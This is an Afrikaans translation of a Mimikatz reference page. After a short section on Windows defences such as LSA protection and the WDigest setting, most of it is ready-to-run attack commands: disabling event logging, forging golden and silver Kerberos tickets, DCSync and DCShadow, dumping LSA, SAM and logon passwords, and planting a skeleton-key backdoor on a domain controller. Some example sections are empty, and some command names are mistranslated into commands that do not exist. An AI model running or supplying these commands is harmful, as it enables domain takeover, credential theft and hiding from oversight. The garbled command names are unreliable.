Mimikatz
Hierdie bladsy is gebaseer op een van adsecurity.org. Kyk na die oorspronklike vir verdere inligting!
LM en duidelike teks in geheue
Vanaf Windows 8.1 en Windows Server 2012 R2 is beduidende maatreëls geïmplementeer om teen diefstal van geloofsbriewe te beskerm:
LM-hashes en duidelike teks wagwoorde word nie meer in die geheue gestoor om sekuriteit te verbeter nie. 'n Spesifieke registerinstelling, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential", moet gekonfigureer word met 'n DWORD-waarde van
0
om Digest-verifikasie uit te skakel, wat verseker dat "duidelike teks" wagwoorde nie in LSASS gekasheer word nie.LSA-beskerming word ingevoer om die Local Security Authority (LSA) proses teen ongemagtigde geheuelees en kode-inspuiting te beskerm. Dit word bereik deur die LSASS as 'n beskermde proses te merk. Aktivering van LSA-beskerming behels:
Wysig die register by HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa deur
RunAsPPL
in te stel asdword:00000001
.Implementering van 'n Groepbeleidsvoorwerp (GPO) wat hierdie registerverandering afdwing op bestuurde toestelle.
Ten spyte van hierdie beskermings kan gereedskap soos Mimikatz LSA-beskerming omseil deur spesifieke bestuurders te gebruik, alhoewel sulke aksies waarskynlik in gebeurtenislogboeke aangeteken sal word.
Teenwerkende SeDebugPrivilege-verwydering
Administrateurs het tipies SeDebugPrivilege, wat hulle in staat stel om programme te ontleed. Hierdie voorreg kan beperk word om ongemagtigde geheue-afleidings te voorkom, 'n algemene tegniek wat deur aanvallers gebruik word om geloofsbriewe uit die geheue te onttrek. Selfs met hierdie voorreg verwyder, kan die TrustedInstaller-rekening steeds geheue-afleidings uitvoer deur 'n aangepaste dienskonfigurasie te gebruik:
Dit maak dit moontlik om die geheue van lsass.exe
na 'n lêer te dump, wat dan op 'n ander stelsel geanaliseer kan word om geloofsbriewe te onttrek:
Mimikatz Opsies
Gebeurtenislog manipulasie in Mimikatz behels twee primêre aksies: die skoonmaak van gebeurtenislogs en die patching van die Gebeurtenisdiens om die log van nuwe gebeure te voorkom. Hieronder is die opdragte vir die uitvoering van hierdie aksies:
Skoonmaak van Gebeurtenislogs
Opdrag: Hierdie aksie is daarop gemik om die gebeurtenislogs te verwyder, wat dit moeiliker maak om kwaadwillige aktiwiteite op te spoor.
Mimikatz bied nie 'n direkte opdrag in sy standaard dokumentasie vir die skoonmaak van gebeurtenislogs direk via sy opdraglyn nie. Gebeurtenislog manipulasie behels egter gewoonlik die gebruik van stelselhulpmiddels of skripte buite Mimikatz om spesifieke logs te skoonmaak (bv. deur PowerShell of Windows Gebeurtenis Kyker te gebruik).
Eksperimentele Funksie: Patching van die Gebeurtenisdiens
Opdrag:
event::drop
Hierdie eksperimentele opdrag is ontwerp om die gedrag van die Gebeurtenislogdiens te wysig, wat dit effektief verhoed dat nuwe gebeure aangeteken word.
Voorbeeld:
mimikatz "privilege::debug" "event::drop" exit
Die
privilege::debug
opdrag verseker dat Mimikatz met die nodige bevoegdhede werk om stelseldienste te wysig.Die
event::drop
opdrag patch dan die Gebeurtenislogdiens.
Kerberos Kaart Aanvalle
Skepping van 'n Goue Kaart
'n Goue Kaart maak dit moontlik om domein-wye toegang na te boots. Sleutelopdrag en parameters:
Opdrag:
kerberos::golden
Parameters:
/domain
: Die domeinnaam./sid
: Die domein se Sekuriteitsidentifiseerder (SID)./user
: Die gebruikersnaam om na te boots./krbtgt
: Die NTLM-hash van die domein se KDC-diensrekening./ptt
: Spuit die kaart direk in die geheue in./ticket
: Stoor die kaart vir later gebruik.
Voorbeeld:
Silwerkaart Skepping
Silwerkaarte verleen toegang tot spesifieke dienste. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan 'n Goue Kaart, maar teiken spesifieke dienste.
Parameters:
/service
: Die diens wat geteiken moet word (bv. cifs, http).Ander parameters soortgelyk aan 'n Goue Kaart.
Voorbeeld:
Vertroue-Tiket Skepping
Vertroue-tikette word gebruik om toegang tot hulpbronne oor domeine heen te verkry deur gebruik te maak van vertrouensverhoudings. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan 'n Goue Tiket, maar vir vertrouensverhoudings.
Parameters:
/target
: Die volledig gekwalifiseerde domeinnaam van die teiken-domein./rc4
: Die NTLM-hash vir die vertrouensrekening.
Voorbeeld:
Bykomende Kerberos-opdragte
Lys van Kaartjies:
Opdrag:
kerberos::lys
Lys alle Kerberos-kaartjies vir die huidige gebruikersessie.
Stuur die Cache:
Opdrag:
kerberos::ptc
Spuit Kerberos-kaartjies in vanaf cache-lêers.
Voorbeeld:
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Stuur die Kaartjie:
Opdrag:
kerberos::ptt
Maak dit moontlik om 'n Kerberos-kaartjie in 'n ander sessie te gebruik.
Voorbeeld:
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Skoonmaak van Kaartjies:
Opdrag:
kerberos::skoonmaak
Maak alle Kerberos-kaartjies skoon uit die sessie.
Nuttig voordat kaartjie-manipulasie-opdragte gebruik word om konflikte te voorkom.
Aktiewe Gids-versteuring
DCShadow: Maak 'n masjien tydelik as 'n DC om AD-objekmanipulasie uit te voer.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Boots 'n DC na om wagwoorddata aan te vra.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
Toegang tot Geldele
LSADUMP::LSA: Haal geldele uit LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Stel 'n DC voor deur 'n rekenaarrekening se wagwoorddata te gebruik.
Geen spesifieke opdrag vir NetSync in oorspronklike konteks verskaf nie.
LSADUMP::SAM: Kry toegang tot die plaaslike SAM-databasis.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Ontsleutel geheime wat in die register gestoor word.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Stel 'n nuwe NTLM-hash vir 'n gebruiker in.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Kry vertroue-verifikasie-inligting.
mimikatz "lsadump::trust" exit
Verskeidenhede
MISC::Skeleton: Spuit 'n agterdeur in LSASS op 'n DC.
mimikatz "privilege::debug" "misc::skeleton" exit
Bevoorregtingverhoging
PRIVILEGE::Backup: Verkry rugsteunregte.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Verkry aflynregte.
mimikatz "privilege::debug" exit
Wagwoordopvraag
SEKURLSA::LogonPasswords: Wys geldele vir aangemelde gebruikers.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Haal Kerberos-kaartjies uit die geheue.
mimikatz "sekurlsa::tickets /export" exit
Sid- en Tokenmanipulasie
SID::add/modify: Verander SID en SIDHistory.
Voeg by:
mimikatz "sid::add /user:targetUser /sid:newSid" exit
Wysig: Geen spesifieke opdrag vir wysig in oorspronklike konteks verskaf nie.
TOKEN::Elevate: Stel tokens voor.
mimikatz "token::elevate /domainadmin" exit
Terminaaldienste
TS::MultiRDP: Laat verskeie RDP-sessies toe.
mimikatz "ts::multirdp" exit
TS::Sessions: Lys TS/RDP-sessies.
Geen spesifieke opdrag vir TS::Sessions in oorspronklike konteks verskaf nie.
Kluis
Haal wagwoorde uit Windows-kluis.
mimikatz "vault::cred /patch" exit
Last updated